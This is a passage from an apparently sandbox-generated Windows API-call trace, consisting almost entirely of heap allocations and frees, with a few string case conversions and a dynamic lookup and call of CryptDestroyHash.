dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6a0 [0252.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa628 [0252.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa898 [0252.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa78 [0252.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0252.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0252.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8b0 [0252.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3e8 [0252.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0252.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa838 [0252.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0252.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0252.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa790 [0252.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa778 [0252.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8c8 [0252.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa418 [0252.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0252.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa808 [0252.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0252.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0252.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0252.033] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0252.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7d8 [0252.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0252.033] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0252.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0252.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0252.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0252.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0252.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0252.034] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0252.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0252.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.034] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0252.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.034] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0252.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0252.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0252.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0252.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0252.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0252.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0252.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0252.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0252.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0252.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0252.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0252.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0252.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0252.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0252.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0252.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0252.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466db0 [0252.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466db0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0252.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0252.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0252.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.038] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0252.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0252.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0252.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0252.038] CryptDestroyHash (hHash=0xaa5820) returned 1 [0252.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0252.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0252.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0252.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0252.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0252.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0252.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0252.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0252.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.042] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0252.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0252.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0252.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0252.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0252.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0252.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0252.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0252.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0252.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.045] HeapFree (in: hHeap=0x25c0000, 